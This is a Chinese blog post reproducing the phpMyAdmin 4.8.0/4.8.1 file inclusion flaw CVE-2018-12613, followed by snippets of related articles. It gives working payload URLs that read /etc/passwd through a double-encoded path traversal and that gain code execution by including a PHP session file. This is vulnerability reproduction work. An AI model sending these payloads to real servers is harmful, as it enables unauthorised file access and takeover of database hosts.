phpmyadmin 远程文件包含漏洞(CVE-2018-12613)

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: 漏洞利用 文章标签: phpmyadmin 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29647709/article/details/84983306
版权

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

漏洞记录

漏洞编号:CVE-2018-12613

受影响版本:phpMyAdmin 4.8.0和4.8.1受到影响。

利用条件:
攻击者必须经过身份验证,但在这些情况下除外:
(/libraries/config.default.php)

  • $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码
  • $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码
  • 漏洞分析
    https://blog.csdn.net/qq_33020901/article/details/80829269

漏洞利用

访问下面的payload

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可见/etc/passwd被读取,说明文件包含漏洞存在:
在这里插入图片描述
目前有几种getshell的方法,有的是上传sql文件,然后包含mysql的sql文件,有的是开启general_log来完成getshell,现在使用今天这种操作。利用方式也比较简单,可以执行一下SELECT ‘<?=phpinfo()?>’;,然后查看自己的sessionid(cookiephpMyAdmin的值),然后包含session文件即可:
在这里插入图片描述

http://192.168.1.15:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_0452064cb94eaca79f085df69ffbb2c2

在这里插入图片描述

参考链接:在这里插入图片描述
https://blog.csdn.net/qq_33020901/article/details/80829269

tdcoming
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613)复现
ximo的博客
03-22 979
CVE-2018-12613 简介: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 搭建环境: 使用docker+vulhub的环境。 复现过程: 访问: index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 可以查看到文件信息: 说明存在文件包含。 在sql中执行SELECT '<?=phpinfo()?&gt
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
BUUCTF[PHPMYADMIN]CVE-2018-12613
qq_62078839的博客
04-24 1945
打开所提供的网址 是个phpmyadmin界面 phpmyadmin的版本号为4.8.1 在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章 phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试..
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1247
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
phpMyadmin各版本漏洞
aiquan9342的博客
10-04 1093
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG   概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞   利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 二: 影响版本:phpMyAdmin v3.5....
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613
bin789456的博客
09-13 108
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613) $target_blacklist = array ( 'import.php', 'export.php' ); // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) &&a
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin所有的 4.6.x 版本(直至 4.6.3),4.4.x ...
phpMyAdmin 4.8.1 远程文件包含漏洞CVE-2018-12613
网络安全。
01-18 1918
0x01 简介 phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。 0x02 漏洞复现 1.将?进行两次URL编码为&quot;%253f&quot;,构造下列payload: http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 漏洞存在。 2.在S...
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)
sweetie 的博客
12-06 560
phpmyadmin 4.8.1远程文件包含漏洞(CVE-2018-12613)复现
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)
weixin_63231007的博客
10-08 2770
_REQUEST['target'] 搜索数组$target_blacklist 中不存在指定的值( ‘import.php’, ‘export.php’)target=db_sql.php%253f/../../../../../../../../../../tmp/sess_[session]target=db_sql.php%253f../../../../../../../../flag 得到flag。$_REQUEST['target'] 参数携带的内容是字符串。
CVE-2018-12613 (phpmyadmin 4.8.1 远程文件包含漏洞)
weixin_44732566的博客
07-04 504
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 0x01 影响范围 phpMyAdmin 4.8.0 and 4.8.1 are affected. 0x02 原理 漏洞代码 $target_blacklist = array ( 'import.php', 'export.php' ); //
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现
Senimo
12-11 1471
漏洞复现 phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 APP:phpMyAdmin 4.8.1 CVECVE-2018-12613 类型:远程文件包含 下载phpMyAdmin 4.8.1源码 漏洞问题出现在index.php页面55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_str
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 548
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
凝聚力安全团队
11-20 4150
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 921
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
CVE-2018-12613 PhpMyadmin后台文件包含分析
热门推荐
3569
06-27 1万+
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.描述:一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。攻击者必须经过身份验证,但在这些情况下除外:$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值